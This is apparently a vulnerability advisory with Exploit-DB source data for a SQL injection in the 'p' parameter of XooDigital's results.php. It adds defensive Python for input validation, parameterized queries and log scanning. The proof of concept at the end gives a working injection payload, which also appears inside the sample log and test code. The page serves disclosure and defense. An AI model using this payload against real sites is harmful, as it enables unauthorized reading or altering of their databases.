Vendor: XooDigital
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: XooDigital
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: NO
Related CWE: N/A
CPE: a:xooscripts:xoodigital
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Year: 2019

XooDigital – ‘p’ SQL Injection

XooDigital is vulnerable to SQL injection via the 'p' parameter of the results.php page. Because the value of 'p' is placed into a SQL query without proper handling, an attacker can inject arbitrary SQL that the backend database executes. This can be exploited to bypass authentication and to read, modify, or delete data in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input must be validated and filtered before it is used in a SQL query, so that a parameter such as 'p' can never change the structure of the query it is placed into.
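The following added example (not part of the advisory and not XooDigital's code) shows the two defensive controls the mitigation calls for, applied to a parameter shaped like 'p': an allow-list check that only accepts a positive integer, and a parameterized query that binds the value as data instead of concatenating it into SQL. It also runs the same check over a few constructed access-log lines so a responder can spot requests to results.php whose 'p' value would have failed validation. The `results` table, its columns, the log format and the sample rows are all assumptions made for the example; only the 'p' parameter, the results.php page and the advisory's payload string come from the page.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample rows standing in for whatever results.php looks up.
# Table and column names are assumptions, not XooDigital's real schema.
SAMPLE_ROWS = [(1, "alpha"), (2, "beta"), (3, "gamma")]

# The payload quoted in the advisory, exactly as it would arrive in 'p'.
ADVISORY_PAYLOAD = "1') OR NOT 7970=7970#"

# Constructed Apache/nginx-style access log lines; the second carries the
# advisory payload URL-encoded in the 'p' query parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Mar/2019:10:00:01 +0000] "GET /app/results.php?p=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [26/Mar/2019:10:00:02 +0000] "GET /app/results.php?p=1%27%29%20OR%20NOT%207970%3D7970%23 HTTP/1.1" 200 2048',
    '10.0.0.7 - - [26/Mar/2019:10:00:03 +0000] "GET /app/index.php HTTP/1.1" 200 300',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP/')


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE results (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO results VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def validate_p(raw):
    """Allow-list check: 'p' must be a positive decimal integer; otherwise None."""
    if raw is None or not re.fullmatch(r"[1-9][0-9]*", raw):
        return None
    return int(raw)


def lookup_hardened(conn, raw_p):
    """Validate 'p' first, then bind it as a query parameter (never concatenate)."""
    p = validate_p(raw_p)
    if p is None:
        return []  # reject the request instead of passing the string to SQL
    cur = conn.execute("SELECT id, name FROM results WHERE id = ?", (p,))
    return cur.fetchall()


def flag_suspicious_requests(log_lines):
    """Return (client_ip, raw_p) for results.php hits whose 'p' fails validation."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith("/results.php"):
            continue
        raw_p = parse_qs(parts.query).get("p", [None])[0]
        if raw_p is None:
            continue  # no 'p' supplied at all; nothing to check here
        if validate_p(raw_p) is None:
            hits.append((m.group("ip"), raw_p))
    return hits


if __name__ == "__main__":
    db = make_db()
    print("valid p=2      ->", lookup_hardened(db, "2"))
    print("advisory value ->", lookup_hardened(db, ADVISORY_PAYLOAD))
    for ip, value in flag_suspicious_requests(SAMPLE_LOG):
        print(f"suspicious results.php request from {ip}: p={value!r}")
```

The allow-list check rejects the advisory's value outright, and even if a non-numeric string slipped past it, the `?` placeholder means the database driver would treat it as a literal id to compare against rather than as SQL text. The log scanner applies the same rule retrospectively, which is a cheap way to find past probing of the parameter once a patch or WAF rule is in place.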
Source (Exploit-DB raw data):

# Exploit Title: XooDigital - 'p' SQL Injection
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://xooscripts.com/product/digital-download-protection-script.html
# Demo Site: http://xooscripts.com/demos/xoodigital/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC : SQLi -----

Request: http://localhost/[PATH]/results.php?p=1
Vulnerable Parameter: p (GET)
Payload: p=1') OR NOT 7970=7970#